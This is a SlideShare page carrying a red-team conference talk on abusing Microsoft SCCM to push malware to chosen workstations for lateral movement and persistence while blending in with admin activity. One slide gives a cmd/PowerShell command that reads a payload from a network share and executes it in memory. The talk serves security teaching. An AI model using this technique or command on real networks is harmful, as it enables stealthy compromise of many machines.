O slideshow foi denunciado.
Utilizamos seu perfil e dados de atividades no LinkedIn para personalizar e exibir anúncios mais relevantes. Altere suas preferências de anúncios quando desejar.
Red Team Upgrades:
Using SCCM for Malware Deployment
@enigma0x3
❖ Penetration Tester and Red Teamer for the Adaptive
Threat Division (ATD) of Veris Group
❖ Active developer on...
❖ What is SCCM and how some admins fail at securing it
❖ Ways to abuse Microsoft’s System Center Configuration
Manager (SC...
Setting the Stage
❖ This talk assumes you have RDP access to a SCCM
server
❖ This talk is focused on abusing SCCM for late...
What is SCCM?
❖ Platform for distributing packages/applications to clients
❖ Packages, applications and install scripts ar...
SCCM in the enterprise
❖ 1 central site server with multiple distribution points
❖ Typically managed via controlled groups...
Right Click Tools
❖ Add-On that can be installed to assist in client
management tasks
❖ Should be installed on a client su...
Yep...
Why use SCCM in Red Teaming?
❖ Manages a ton of distributed clients
➢ Take control of the server and you have distributed ...
Why use SCCM in Red Teaming? (cont)
❖ Allows you to identify and strategically group targets
➢ Able to push implants out i...
Abusing SCCM: Hunting
❖ Some organizations have user->device mapping
➢ This allows for admins to create specific groups fo...
Abusing SCCM: Compromise
❖ Create an application/package that utilizes PowerShell for
payload delivery and execution
❖ Do ...
Abusing SCCM: Compromise
❖ Create a script installer application to fetch and execute
your payload
➢ cmd.exe /c “powershel...
Questions and Contact
❖ Feel free to hit me up!
❖ enigma0x3 [at] gmail [dot] com
❖ @enigma0x3 on Twitter and Github
❖ enig...
References
❖ https://www.trustedsec.com/files/Owning_One_Rule_All_v2.pdf
❖ https://enigma0x3.wordpress.com/2015/10/27/targ...
Red team upgrades   using sccm for malware deployment
Red team upgrades   using sccm for malware deployment
Próximos SlideShares
Carregando em…5
×

Red team upgrades using sccm for malware deployment

3.995 visualizações

Publicada em

Matt Nelson - Veris Group's Adaptive Threat Division

Publicada em: Internet
  • Seja o primeiro a comentar

Red team upgrades using sccm for malware deployment

  1. 1. Red Team Upgrades: Using SCCM for Malware Deployment
  2. 2. @enigma0x3 ❖ Penetration Tester and Red Teamer for the Adaptive Threat Division (ATD) of Veris Group ❖ Active developer on the PowerShell Empire project ❖ Offensive PowerShell advocate ❖ 2nd time speaking! ❖ This con is probably older than I am ❖ Indiana corn farmer turned h4x0r (not really)
  3. 3. ❖ What is SCCM and how some admins fail at securing it ❖ Ways to abuse Microsoft’s System Center Configuration Manager (SCCM) for targeted network compromise. ➢ I’m going to cover targeted, strategic use as opposed to mass pwnage What this is...
  4. 4. Setting the Stage ❖ This talk assumes you have RDP access to a SCCM server ❖ This talk is focused on abusing SCCM for lateral movement/persistence in a targeted manner, not obtaining access to SCCM. ❖ No, having access to SCCM does not mean you own the enterprise ❖ If you administer SCCM as a domain admin, you fail.
  5. 5. What is SCCM? ❖ Platform for distributing packages/applications to clients ❖ Packages, applications and install scripts are hosted on the SCCM server ❖ Setup and maintained via an agent/server architecture ❖ Consists of a central site server with distribution points. ➢ Agents check in to server periodically to obtain new packages/applications ❖ Basically acts as internal RAT/C2
  6. 6. SCCM in the enterprise ❖ 1 central site server with multiple distribution points ❖ Typically managed via controlled groups ➢ e.g. “SCCM Admins” in AD ❖ Typically setup/configured using a service account to run the application/push updates ❖ Application contents (*cough, cough install scripts and notes*) are hosted on a publicly available share ❖ Admins gonna admin
  7. 7. Right Click Tools ❖ Add-On that can be installed to assist in client management tasks ❖ Should be installed on a client such as an administrative workstation...not on the server ➢ Admins install it on the server anyways ❖ Enables full control of managed endpoints
  8. 8. Yep...
  9. 9. Why use SCCM in Red Teaming? ❖ Manages a ton of distributed clients ➢ Take control of the server and you have distributed workstation control ➢ SCCM agents are just waiting to run your code ❖ Live off of the land ➢ Keep your malicious implant count low, use SCCM for very targeted implant distribution ➢ Looks like normal day-to-day traffic/activity ➢ To limit the risk of getting caught, become an admin and not a typical adversary
  10. 10. Why use SCCM in Red Teaming? (cont) ❖ Allows you to identify and strategically group targets ➢ Able to push implants out in a very controlled and surgical manner ❖ Also acts as a persistence mechanism
  11. 11. Abusing SCCM: Hunting ❖ Some organizations have user->device mapping ➢ This allows for admins to create specific groups for departments ❖ We can abuse this to hunt for specific users without generating any additional network/domain traffic
  12. 12. Abusing SCCM: Compromise ❖ Create an application/package that utilizes PowerShell for payload delivery and execution ❖ Do so by creating a PowerShell payload and throw it up on the public share SCCM uses (typically something like sccmsource)
  13. 13. Abusing SCCM: Compromise ❖ Create a script installer application to fetch and execute your payload ➢ cmd.exe /c “powershell.exe -c “gc serverNamesharedFolderApplicationFolderpayload.txt | iex”” ❖ Deploy the application to your target group and wait for the SCCM agents to check in ➢ Payload is fetched over UNC and runs in memory ❖ More here: ➢ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation- compromise-with-sccm/
  14. 14. Questions and Contact ❖ Feel free to hit me up! ❖ enigma0x3 [at] gmail [dot] com ❖ @enigma0x3 on Twitter and Github ❖ enigma0x3 on Freenode: #psempire ❖ Blog: enigma0x3.wordpress.com
  15. 15. References ❖ https://www.trustedsec.com/files/Owning_One_Rule_All_v2.pdf ❖ https://enigma0x3.wordpress.com/2015/10/27/targeted-workstation- compromise-with-sccm/

×